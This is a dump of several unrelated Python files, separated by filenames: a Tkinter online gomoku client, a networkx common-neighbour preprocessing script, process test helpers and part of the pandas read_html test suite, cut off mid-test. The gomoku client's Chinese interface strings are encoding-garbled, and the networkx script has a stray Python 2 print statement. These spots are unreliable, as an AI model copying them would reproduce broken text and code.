def __init__(self, _root, code: str, player: int, is_new: bool = False, w: int = None, h: int = None):
self.code = code
self.myself = player
net = FAINetwork()
        # A new room needs to be created.
if is_new is True:
self.w, self.h = w, h
js = net.post_result(code, player, action='put', size='%sx%s' % (w, h))
js = net.get_result(code)
self.data = js['data']
else:
js = net.get_result(code)
self.data = js['data']
self.h = len(self.data.split('\n'))
self.w = len(self.data.split('\n')[0])
self.fai = FAI(self.w, self.h)
w = self.w
h = self.h
self.root = _root
self.root.resizable(width=False, height=False)
self.root.attributes('-alpha', 0.9)
self.root.title("FAI - ๅจ็บฟไบๅญๆฃๅฏนๆ็จๅบ (ๆฟ้ด %s)" % code)
self.started = False
self.stopped = False
self.time_p1, self.time_p2 = 0, 0
self.var_p1, self.var_p2 = StringVar(), StringVar()
self.message = StringVar()
self.player = 1
        self.song = tkFont.Font(family='SimSun', size=12, weight=tkFont.BOLD)
self.frame_p1 = Frame(self.root)
        # self.button = Button(self.root, text='New game', command=lambda: (self.root.destroy(), init_ui()))
self.message.set("ๆฐๅผไธๅฑ")
self.button = Button(self.root, textvariable=self.message, command=lambda: self.init_data(w, h), relief='groove')
self.frame_p2 = Frame(self.root)
Label(self.frame_p1, text="P1").grid(row=0, column=0)
Label(self.frame_p1, text="โ", font=self.song).grid(row=0, column=1)
Label(self.frame_p1, textvariable=self.var_p1).grid(row=1, columnspan=3)
Label(self.frame_p2, text="P2").grid(row=0, column=0)
Label(self.frame_p2, text="โ", font=self.song).grid(row=0, column=1)
Label(self.frame_p2, textvariable=self.var_p2).grid(row=1, columnspan=3)
self.frame = Frame(self.root)
self.map = [[None for i in range(w)] for i in range(h)]
self.click = [[None for i in range(w)] for i in range(h)]
self.vars = [[StringVar() for i in range(w)] for i in range(h)]
for y in range(h):
for x in range(w):
self.click[y][x] = FaiUiClick(self, fai=self.fai, w=w, h=h, x=x, y=y)
for y in range(self.h):
for x in range(self.w):
self.vars[y][x].set(self.fai.get_char(x=x, y=y))
self.refresh_time()
for y in range(h):
for x in range(w):
self.map[y][x] = Button(self.frame,
command=self.click[y][x].run,
# text=self.fai.CODE[self.fai.map[y][x]])
textvariable=self.vars[y][x],
font=self.song,
relief='groove',
bd=1)
self.map[y][x].grid(row=y, column=x)
self.frame_p1.grid(row=0, column=0)
# self.button.grid(row=0, column=1)
self.frame_p2.grid(row=0, column=2)
self.frame.grid(row=1, columnspan=3)
self.thread = None
self.thread_data = None
self.start()
def init_data(self, w: int, h: int):
self.w, self.h = w, h
self.time_p1, self.time_p2 = 0, 0
self.player = 1
self.started = False
self.stopped = False
self.message.set("ๆฐๅผไธๅฑ")
self.fai = FAI(w, h)
self.refresh_time()
for i in self.map:
for j in i:
j.grid_forget()
self.map = [[None for i in range(w)] for i in range(h)]
self.click = [[None for i in range(w)] for i in range(h)]
self.vars = [[StringVar() for i in range(w)] for i in range(h)]
for y in range(h):
for x in range(w):
self.click[y][x] = FaiUiClick(self, fai=self.fai, w=w, h=h, x=x, y=y)
for y in range(self.h):
for x in range(self.w):
self.vars[y][x].set(self.fai.get_char(x=x, y=y))
for y in range(h):
for x in range(w):
self.map[y][x] = Button(self.frame,
command=self.click[y][x].run,
# text=self.fai.CODE[self.fai.map[y][x]])
textvariable=self.vars[y][x],
font=self.song,
relief='groove',
bd=1)
self.map[y][x].grid(row=y, column=x)
if self.thread is not None:
self.started = False
self.thread.join()
self.thread = None
def update_time(self):
if self.player == 1:
self.time_p1 = self.time_p1 + 0.25
if self.player == 2:
self.time_p2 = self.time_p2 + 0.25
        # Refresh the display only on whole-second boundaries.
if self.time_p1 - int(self.time_p1) == 0 or self.time_p2 - int(self.time_p2) == 0:
self.refresh_time()
def refresh_time(self):
m, s = divmod(int(self.time_p1), 60)
self.var_p1.set("%02d:%02d" % (m, s))
m, s = divmod(int(self.time_p2), 60)
self.var_p2.set("%02d:%02d" % (m, s))
if self.player == 1:
            self.var_p1.set(self.var_p1.get() + " (to move)")
if self.player == 2:
            self.var_p2.set(self.var_p2.get() + " (to move)")
def update_loop(self):
while True:
time.sleep(0.25)
if self.started is False:
return
self.update_time()
def start(self):
self.started = True
# if self.thread is not None:
# self.thread.stop()
self.update_time()
self.thread = threading.Thread(target=self.update_loop)
        # Daemon thread: it exits automatically when the main thread exits.
        self.thread.daemon = True
self.thread.start()
self.thread_data = threading.Thread(target=self.refresh_data)
        # Daemon thread: it exits automatically when the main thread exits.
        self.thread_data.daemon = True
self.thread_data.start()
    # Periodically refresh the board contents from the server.
def refresh_data(self):
net = FAINetwork()
while True:
# data = net.get_data(self.code)
js = net.get_result(self.code)
if 'error' in js:
logger.error(js['error'])
return
data = js['data']
logger.info('Got json: %s' % json.dumps(js))
self.data = data
# logger.debug(data)
split = data.split('\n')
for y in range(len(split)):
for x in range(len(split[y])):
self.fai.map[y][x] = int(split[y][x])
self.vars[y][x].set(self.fai.get_char(x=x, y=y))
time.sleep(1)
if self.started is False:
return
def list2data(self, li: list):
data = ''
for y in li:
for x in y:
data = data + str(x)
data = data + '\n'
data = data[:-1]
return data
def data2list(self, data: str = None):
if data is None:
data = self.data
split = data.split('\n')
li = []
for y in split:
ix = []
for x in y:
ix.append(int(x))
li.append(ix)
return li
def refresh(self):
for y in range(self.h):
for x in range(self.w):
self.vars[y][x].set(self.fai.get_char(x=x, y=y))
m, s = divmod(self.time_p1, 60)
self.var_p1.set("%02d:%02d" % (m, s))
m, s = divmod(self.time_p2, 60)
self.var_p2.set("%02d:%02d" % (m, s))
if self.player == 1:
            self.var_p1.set(self.var_p1.get() + " (to move)")
if self.player == 2:
            self.var_p2.set(self.var_p2.get() + " (to move)")
# if __name__ == '__main__':
# fai = FAI(8, 8)
# # fai.put(0, 4, fai.P2)
# # fai.put(0, 5, fai.P1)
# # fai.put(0, 6, fai.P1)
# # fai.put(0, 7, fai.P1)
# # fai.put(0, 8, fai.P1)
# #
# # fai.put(1, 0, fai.P1)
# # fai.put(2, 0, fai.P2)
# # fai.put(3, 0, fai.P2)
# # fai.put(4, 0, fai.P2)
# # fai.put(5, 0, fai.P2)
#
# # fai.put(6, 1, fai.P1)
# # fai.put(5, 2, fai.P1)
# # fai.put(4, 3, fai.P1)
# # fai.put(3, 4, fai.P1)
# # fai.put(2, 5, fai.P1)
#
# # fai.put(2, 2, fai.P1)
# # fai.put(2, 3, fai.P1)
# # fai.put(2, 4, fai.P1)
# # fai.put(2, 5, fai.P1)
# # fai.put(2, 6, fai.P1)
#
# fai.put(0, 1, fai.P1)
#
# fai.play(fai.P1)
# print(fai)
# print("Player", fai.win(), 'is winner')
# A dedicated class per click callback (wasteful of memory, but keeps state simple).
class FaiUiClick:
def __init__(self, _ui: FaiUi, fai, x=0, y=0, w=0, h=0):
self.ui = _ui
self.x, self.y = x, y
self.w, self.h = w, h
self.fai = fai
def set_pos(self, x, y):
self.x, self.y = x, y
def post_thread(self):
net = FAINetwork()
        # Trial placement on a copy of the board.
fai = copy.deepcopy(self.fai)
res = fai.put(self.x, self.y, self.ui.player)
# self.fai.put(self.x, self.y, random.randint(0, 2))
        # The placement is legal.
if res:
li = self.ui.data2list()
li[self.y][self.x] = self.ui.player
data = self.ui.list2data(li)
self.ui.data = data
self.ui.fai.map = li
self.ui.refresh()
net.post_result(self.ui.code, self.ui.player, action='put', data=data)
# if self.ui.player == 1:
# self.ui.player = 2
# elif self.ui.player == 2:
# self.ui.player = 1
if self.ui.started is False:
self.ui.start()
self.ui.refresh()
win = self.fai.win()
if win != 0:
self.ui.message.set("P%d่ท่" % win)
self.ui.stopped = True
self.ui.started = False
def run(self):
if self.ui.stopped is True:
return
print('clicked:', 'x:', self.x, 'y:', self.y, 'player:', self.ui.player)
t = threading.Thread(target=self.post_thread)
t.start()
class FAIConfig:
def __init__(self, _root):
self.root = _root
self.root.title("FAI - ๅจ็บฟไบๅญๆฃๅฏนๆ็จๅบ")
self.root.resizable(width=False, height=False)
self.frame = Frame(self.root)
Label(self.frame, text="ๆฟ้ด").grid(row=0, column=0)
self.code = StringVar()
self.code.set("Master")
Entry(self.frame, textvariable=self.code).grid(row=0, column=1, sticky=W+E)
        self.frame_wh = LabelFrame(self.frame, text='New room')
self.w = StringVar()
self.h = StringVar()
self.entry_w = Entry(self.frame_wh, width=8, textvariable=self.w)
self.entry_h = Entry(self.frame_wh, width=8, textvariable=self.h)
# self.w.insert(0, "15")
# self.h.insert(0, "15")
self.w.set("15")
self.h.set("15")
self.entry_w.configure(state=DISABLED)
self.entry_h.configure(state=DISABLED)
Label(self.frame_wh, text="ๅฎฝๅบฆ").grid(row=2, column=0)
Label(self.frame_wh, text="้ซๅบฆ").grid(row=2, column=2)
self.entry_w.grid(row=2, column=1)
self.entry_h.grid(row=2, column=3)
self.frame_wh.grid(row=1, columnspan=3, sticky=W+E)
self.var_check = BooleanVar()
self.var_player = IntVar()
self.var_player.set(1)
Checkbutton(self.frame, text="ๅปบ็ซๆฐๆฟ้ด", variable=self.var_check,
command=self.check_fun)\
.grid(row=2, columnspan=3)
        self.frame_player = LabelFrame(self.frame, text='Player')
Radiobutton(self.frame_player, value=1, variable=self.var_player, text='P1').grid(row=0, column=0)
Radiobutton(self.frame_player, value=2, variable=self.var_player, text='P2').grid(row=0, column=1)
        Radiobutton(self.frame_player, value=0, variable=self.var_player, text='Spectate').grid(row=0, column=2)
self.frame_player.grid(row=3, columnspan=3, sticky=W+E)
self.var_message = StringVar()
        self.var_message.set('Start')
Button(self.frame, textvariable=self.var_message, command=self.done)\
.grid(row=40, columnspan=2, sticky=W + E)
self.frame.grid()
self.ui = None
self.waiting = False
def check_fun(self):
if self.var_check.get() is True:
self.entry_w.configure(state=NORMAL)
self.entry_h.configure(state=NORMAL)
else:
self.entry_w.configure(state=DISABLED)
self.entry_h.configure(state=DISABLED)
def run_thread(self):
net = FAINetwork()
        self.var_message.set('Waiting for the server to respond...')
res = net.wakeup(timeout=30)
if res is False:
self.waiting = False
self.var_message.set("็ฝ็ป้่ฏฏ/ๆๅกๅจๅๅบ้่ฏฏ")
tkinter.messagebox.showerror("็ฝ็ป้่ฏฏ", "ๆๅกๅจๅๅบ้่ฏฏ")
return
        self.var_message.set('Server response... OK')
try:
if self.var_check.get() is True:
self.ui = FaiUi(self.root, self.code.get(), self.var_player.get(),
is_new=True, w=int(self.w.get()), h=int(self.h.get()))
else:
self.ui = FaiUi(self.root, self.code.get(), self.var_player.get(),
is_new=False)
except ValueError as e:
self.waiting = False
self.var_message.set("ๅๆฐ่ฎพ็ฝฎ้่ฏฏ")
tkinter.messagebox.showerror("ๅๆฐ่ฎพ็ฝฎ้่ฏฏ", str(e))
return
self.frame.destroy()
        # mainloop is not needed here.
# self.ui.root.mainloop()
def done(self):
if self.waiting is True:
return
print('done', self.var_check.get(), self.var_player.get(), self.w.get(), self.h.get())
if self.code.get() == '':
tkinter.messagebox.showerror("ๆฟ้ด้่ฏฏ", "ๆฟ้ดๅไธบ็ฉบ")
return
self.waiting = True
t = threading.Thread(target=self.run_thread)
t.start()
logger = getLogger(__name__)
logger.info('Started')
if __name__ == '__main__':
# init_ui(12, 12)
# ui.root.mainloop()
config = FAIConfig(Tk())
config.root.mainloop()
|
common_neighbor_preprocess.py | import argparse
import networkx as nx
from multiprocessing import Process, Manager, cpu_count
import time
import os
def parse_args():
"Preprocessing for the commoneighbor"
parser = argparse.ArgumentParser(description='Preprocessing Commoneigbors')
parser.add_argument('--input', nargs='?', default='../graph/CA-AstroPh.txt',
help='Input graph path')
parser.add_argument('--output', nargs='?', default='../pre_data/CA-AstroPh_comneig.txt',
help='output the common neighbors')
parser.add_argument('--workers', type=int, default=10,
                        help='Number of parallel workers, default = 10')
return parser.parse_args()
def read_graph():
'''
Reads the input network in networkx.
'''
G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.Graph())
return G
def common_neighbors_score_parallel(G, nodes, num_workers=cpu_count()):
comneb_file = args.output
if os.path.exists(comneb_file):
os.remove(comneb_file)
with Manager() as manager:
comm_neighbor = manager.dict()
comm_nei_list = []
node_len = len(nodes)
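        # Split the node list into num_workers contiguous, near-equal chunks.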
for i in range(num_workers):
start = node_len * i // num_workers
end = node_len * (i + 1) // num_workers
ttt1 = time.time()
comm_nei = Process(target=common_neighbor_process, args=(G, nodes[start:end], comm_neighbor))
comm_nei.start()
ttt2 = time.time()
comm_nei_list.append(comm_nei)
for res in comm_nei_list:
res.join()
_comm_neighbor = comm_neighbor.copy()
f = open(comneb_file, 'a+')
for edge in _comm_neighbor:
f.write(u"{} {} {}\n".format(str(edge[0]), str(edge[1]), str(_comm_neighbor[edge])))
f.close()
return _comm_neighbor
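# Worker: for every edge (cur, w), count the neighbors shared by cur and w
# (excluding w itself from cur's neighborhood).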
def common_neighbor_process(G, nodes, comm_neighbor):
for cur in nodes:
for w in G[cur]:
            v_nei = list(G[cur].keys())  # materialize the view so remove() works
v_nei.remove(w)
comm_neighbor[cur, w] = len(set(v_nei).intersection(set(G[w].keys())))
return comm_neighbor
def main(args):
print("load graph")
nx_G = read_graph()
print("Common neighbor preparing:")
time1 = time.time()
nodes = list(nx_G.nodes())
common_neighbors_score_parallel(nx_G, nodes, args.workers)
time2 = time.time()
print "Common neighbor time:", (time2-time1), 's'
if __name__ == "__main__":
args = parse_args()
    main(args)
|
helpers.py | import multiprocessing
import sys
import time
from typing import List, Optional
def sleep(sleepTime: float):
time.sleep(sleepTime)
def sleepWithExitCode(sleepTime: float, sysExitCode: int):
sleep(sleepTime)
if sysExitCode:
sys.exit(sysExitCode)
def sleepWithRetCode(sleepTime: float, returnCode: int):
sleep(sleepTime)
if returnCode:
return returnCode
def mpChild(sleepTime: float):
"""
This function is spawned by mpParent() and does nothing except wait.
"""
time.sleep(sleepTime)
def mpParent(childNum: int, sleepTime: float = 3):
"""
This function spawns other child processes mpChild() -
needed for PID and process control test functions.
"""
childs = []
# spawn child processes
for child in range(childNum):
proc = multiprocessing.Process(target=mpChild, args=(sleepTime, ))
childs.append(proc)
proc.start()
# wait for spawned processes to finish
for child in childs:
child.join()
time.sleep(1)
def getTestProcArgs(sleepTimeSec: Optional[float] = 10) -> List[str]:
""" Return command line string necessary to spawn this file as a subprocess
(and execute __main__).
Args:
sleepTimeSec: set the time spawned process should sleep.
Returns:
Command line arguments (list of strings) to spawn this file __main__.
"""
args = [sys.executable, __file__, str(sleepTimeSec)]
return args
if __name__ == "__main__":
if len(sys.argv) == 2:
sleepTime = float(sys.argv[1])
else:
sleepTime = 10
sleep(sleepTime)
sys.exit(0)
|
test_html.py | from functools import partial
from importlib import reload
from io import BytesIO, StringIO
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=td.skip_if_no("bs4")),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@pytest.mark.xfail(reason="Html file was removed")
@tm.network
def test_banklist_url_positional_match(self):
url = "https://www.fdic.gov/bank/individual/failed/banklist.html"
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
url, "First Federal Bank of Florida", attrs={"id": "table"}
)
with tm.assert_produces_warning(FutureWarning):
df2 = self.read_html(url, "Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@pytest.mark.xfail(reason="Html file was removed")
@tm.network
def test_banklist_url(self):
url = "https://www.fdic.gov/bank/individual/failed/banklist.html"
df1 = self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "table"}
)
df2 = self.read_html(url, match="Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/master/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, match=".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError):
self.read_html("git://github.com", match=".*Water.*")
@tm.network
@pytest.mark.slow
def test_invalid_url(self):
try:
with pytest.raises(URLError):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
except ValueError as e:
assert "No tables found" in str(e)
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, match="Water", skiprows=-1)
@tm.network
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@tm.network
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[
0
]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(
self.banklist_data, match="Gold Canyon", attrs={"id": "table"}
)[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
